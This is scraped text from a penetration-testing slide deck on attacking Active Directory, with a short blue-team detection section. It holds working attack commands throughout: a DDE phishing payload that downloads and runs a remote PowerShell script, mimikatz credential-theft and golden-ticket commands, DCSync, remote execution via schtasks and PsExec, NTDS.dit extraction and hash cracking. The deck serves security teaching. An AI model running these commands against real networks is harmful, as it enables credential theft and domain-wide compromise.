  • 27. ciyinet 27 PHISHING + DDEAUTO = RCE • Dynamic Data Exchange (DDE): protocol for transferring data between applications • Valid for MS Excel, MS Word… and MS Outlook • Recently used as macro-less Malware DDEAUTO "C:ProgramsMicrosoftOffice365Outlook........windowssystem 32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire- test.ps1');powershell -e $e # " "Beneficios Qurtuba" Pentesting Active Directory
  • 29. ciyinet 29 NEXT STEPS • Persistence (userland) • Recoinaissance • Privilege escalation • PowerSploit PowerUp • Bypass UAC • … • Persistence (admin) • Lateral and vertical movements • Grab and exfiltrate trophies Pentesting Active Directory
  • 31. ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description ipconfig /all Displays the IP address, subnet mask, and default gateway for all adapters. Also info about DHCP and DNS settings whoami /all Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to net localgroup Displays the name of the server and the names of local groups on the computer. net localgroup “administrators” Displays local administrators netstat -an Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table tasklist /V Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer 31Pentesting Active Directory
  • 32. ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description net start Lists started Windows services sc qc <SERVICE> Gets the parameters for an individual service accesschk.exe -ucqv <SERVICE> Determine service access control rules (accesschk.exe is part of Microsoft Sysinternals suite) systeminfo > info_output.txt Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards schtasks /query /fo LIST /v list of scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, what permissions they are run with dir, type, findstr Browse and search for information in the local file system. 32Pentesting Active Directory
  • 33. ciyinet NETWORK RECONNAISSANCE Command Description ping ☺ echo %USERDOMAIN% Domain name which the host is joined to echo %logonserver% Obtains the name of the Domain Controller the host used to authenticate toset logonserver net group /domain Lists existing groups in the domain net group <GROUP NAME>/domain Lists members of a group. I.e: “domain computers”, “domain controllers”, “domain admins” net localgroup administrators /domain Gets members of the built-in group “Administrators” Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 33Pentesting Active Directory
  • 34. ciyinet NETWORK RECONNAISSANCE Command Description net user /domain Lists all users within the domaindominio actual net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username net view Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain net use Access to shared resources net accounts /domain Obtains the domain password policy nltest /domain_trusts Maps trust relationships Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 34Pentesting Active Directory
  • 37. ciyinet 37 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
  • 38. ciyinet 38 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
  • 39. ciyinet 39 KERBEROAST Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Attacker
  • 40. ciyinet 40 KERBEROAST • Offline brute force of password of service account within service tickets (TGS) • No risk of detection • No account lockouts • Invoke-Kerberoast from PowerView (dev) to collect hashes • Focus on user accounts. They have shorter passwords • JohnTheRipper (magnumripper) to crack them References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/magnumripper/JohnTheRipper Pentesting Active Directory
  • 41. ciyinet 41 SMB SHARES MINING • Usually very fruitful, but sometimes boring and time consuming • Enumerating shares in the environment and looking for data with hardcoded creds (scripts, config files), backups, documentation… PowerView Find-ShareDomain • Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned. smbmap • Intended to simplify searching for potentially sensitive data across large networks. • Enumerates samba share drives across an entire domain. List drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc. Reference: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/ShawnDEvans/smbmap Pentesting Active Directory
  • 42. ciyinetTitulo de la Ponencia 42
  • 43. ciyinet 43 CREDENTIAL THEFT SHUFFLE • Escalating privileges on some machine • Extracting creds/hashes from memory • Derivative administrator • User hunting: moving laterally and repeating the attack till Domain Admin level is reached References: https://github.com/gentilkiwi/mimikatz Pentesting Active Directory “Mimikatz dance”
  • 45. ciyinet 45 USER HUNTING List local admins remotely • Get-localadmin (Script) • Get-NetLocalGroup (PowerView) List active sessions remotely • PsLoggedon (Sysinternals) • Get-NetLoggedon (PowerView) • Get-NetSession (PowerView) • Tasklist References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://docs.microsoft.com/en-us/sysinternals/ https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md Pentesting Active Directory
  • 47. ciyinet 47 USER HUNTING • Invoke-UserHunter (PowerView) • BloodHound 1. Gets groups and group members of each group 2. Lists domain computers 3. Obtains local admins for each computer 4. Lists active sessions on each computer References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/BloodHoundAD/BloodHound Pentesting Active Directory
  • 49. Creds dump + Privs escalation
  • 51. ciyinet 51 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
  • 52. ciyinet 52 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
  • 53. ciyinet 53 OVERPASS-THE-HASH (PASS-THE-KEY) Kerberos Kerberos References: http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
  • 54. ciyinet 54 (OVER)PASS-THE-HASH Pentesting Active Directory mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
  • 55. Titulo de la Ponencia 55
  • 56. ciyinetPentesting Active Directory 56 PASS-THE-TICKET • Inject Kerberos tickets • Tickets must be in Kerberos credential format (KRB_CRED) - http://tools.ietf.org/html/rfc4120#section-5.8 • Kerberos module does not require any privilege. It uses official Microsoft Kerberos API mimikatz.exe "kerberos::ptt FILENAME"
  • 57. ciyinet 57 GOLDEN TICKET Encrypted with KRBTGT hash Attacker TGT: • Username • Groups membership • … krbtgt:hash Pentesting Active Directory
  • 58. ciyinet 58 GOLDEN TICKET KRBTGT hash can be used to generate arbitrary TGT: • Made by the attacker, not KDC • Anything can be pushed inside mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt" Pentesting Active Directory
  • 60. ciyinet 60 DCSYNC • It “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller • Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol) • Special rights are required to run DCSync mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit mimikatz.exe "lsadump::dcsync /all /csv" exit Pentesting Active Directory
  • 62. ciyinetPentesting Active Directory 62 DCSHADOW Register new domain controllers to inject malicious AD objects and so create backdoors or any kind of illegitimate access or right Reference: https://blog.alsid.eu/dcshadow-explained-4510f52fc19d Hi guys! This is DCShadow!
  • 63. PENTESTING ACTIVE DIRECTORY dir is boring, show me how to RCE
  • 64. ciyinetPentesting Active Directory 64 REMOTE CODE EXECUTION AT Schtasks SC at TARGET_HOST HH:MM EXECUTABLE schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System schtasks /run /tn TASK_NAME /S TARGET_HOST sc TARGET_HOST create SERVICE_NAME binpath= “EXECUTABLE” sc TARGET_HOST start SERVICE_NAME
  • 65. ciyinetPentesting Active Directory 65 REMOTE CODE EXECUTION WMIC WinRM PsExec wmic /node:TARGET_HOST process call create “EXECUTABLE” Invoke-Command –ComputerName TARGET_HOST –ScriptBlock { COMMAND(S) } PsExec.exe TARGET_HOST –u USER PROCESS
  • 68. ciyinet NTDS.DIT How-to get hashes from it: 1. Decrypt Password Encryption Key (PEK). PEK is encrypted using bootkey 2. Hashes decryption first round with PEK using RC4 3. Hashes decryption second round with DES 68Pentesting Active Directory
  • 69. ciyinet 69 GRAB NTDS.DIT AND SYSTEM Volume Shadow Copy Ntdsutil Invoke-NinjaCopy Invoke-NinjaCopy –Path “C:WindowsNTDSntds.dit” –LocalDestination “C:ntds.dit” Invoke-NinjaCopy –Path “C:WindowsSystem32configSYSTEM” –LocalDestination “C:SYSTEM” ntdsutil "ac i ntds" "ifm" "create full c:copy-ntds" quit quit vssadmin create shadow /for=C: Pentesting Active Directory
  • 70. ciyinetTitulo de la Ponencia 70
  • 71. ciyinetTitulo de la Ponencia 71
  • 72. ciyinet John the Ripper Hashcat & Rockyou wordlist 72 CRACKING NT HASHES john FILE_HASHES --format=NT hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot Pentesting Active Directory
  • 75. PENTESTING ACTIVE DIRECTORY But how about the blue team? Microsoft ATA
  • 77. ciyinet 77 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
  • 78. ciyinet 78 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
  • 80. ciyinet 80 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
  • 81. ciyinet 81 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
  • 82. ciyinet 82 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
  • 83. ciyinet 83 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Pentesting Active Directory
  • 84. ciyinet 84 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Microsoft ATA Attacker Pentesting Active Directory
  • 86. ciyinet 86 • Plaintext creds • WDigest • SMB Mining • mimikittenz • LaZagne • WCMDump • Hash • Memory dump • … Pentesting Active Directory
  • 87. ciyinet 87 • Run as • NTLM Relay • Pass-the-hash • Pass-the-ticket • Golden ticket Logon session User SID Group SIDs Logon SID Others … Access token Pentesting Active Directory
  • 88. ciyinet 88 • PsExec • WinRM • AT • Schtasks • WMIC • SC Pentesting Active Directory
  • 89. ciyinet 89 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
  • 90. ciyinet 90 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
  • 91. ciyinet 91 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
  • 92. ciyinet 92 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
  • 93. ciyinet 93 BUSINESS RISK Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain, all users, servers, workstations and data. Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees. “Once domain admin, always domain admin” Pentesting Active Directory
  • 94. ciyinet 94 ACKNOWLEDGMENT & REFERENCES • Miroslav Sotak and TVM team • FWHIBBIT • RootedCON and any other Sec Community in Spain Pentesting Active Directory
  • 95. ciyinetPentesting Active Directory 95 PENTESTING ACTIVE DIRECTORY